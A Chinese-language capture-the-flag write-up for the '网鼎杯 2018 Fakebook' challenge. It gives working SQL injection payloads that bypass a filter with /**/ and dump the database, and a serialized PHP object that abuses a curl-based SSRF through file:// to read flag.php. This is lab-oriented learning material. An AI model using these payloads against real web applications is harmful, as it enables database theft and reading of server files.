[网鼎杯 2018]Fakebook

解法一

在robots.txt，可以发现/user.php.bak

下载下来是一段代码

<?phpclass UserInfo
{public $name = "";public $age = 0;public $blog = "";public function __construct($name, $age, $blog){$this->name = $name;$this->age = (int)$age;$this->blog = $blog;}function get($url){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$output = curl_exec($ch);$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);if($httpCode == 404) {return 404;}curl_close($ch);return $output;}public function getBlogContents (){return $this->get($this->blog);}public function isValidBlog (){$blog = $this->blog;return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);}}

很明显是 SSRF的 , 但还不知道要咋用

注册一个账号登录进去 , 可以发现在url上存在一个参数可以进行传参

/view.php?no=1
先随便传点东西进去

估计存在sql注入啥的, 尝试进行测试

估计就是sql注入了, 需要绕过一些过滤

union select 不行, 但是单独的union 和 select 可以, 可能是不能连一起 , 中间用 /**/
可以正常回显

在测试的时候可以发现第二个参数可以回显
当前数据库: fakebook

得到表名:users
/view.php?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'--+

得到列名: no,username,passwd,data

/view.php?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='fakebook' and table_name='users'--+

得到数据看着很糊, 但没有flag
/view.php?no=-1 union/**/select 1,group_concat(no,username,passwd,data),3,4 from fakebook.users--+

单独看 data 的数据
很明显的反序列化的内容 , 之前注册账号的内容
/view.php?no=-1 union/**/select 1,group_concat(data),3,4 from fakebook.users--+

这里就要跟前面得到的代码有关了

利用SSRF的file协议读取本地文件
(前面给的序列化字符串, 猜测应该会进行一个反序列化)

<?php
class Userinfo
{public $name = "www";public $age = 15;public $blog = "file:///var/www/html/flag.php";
}
$data = new Userinfo();
echo serialize($data);

?no=-1 union/**/select 1,2,3,'O:8:"Userinfo":3:{s:4:"name";s:3:"www";s:3:"age";i:15;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

前面可以知道是data字段存放着序列化的字符串 , 所以将自己构造的序列化字符串放在第四个位置注入进去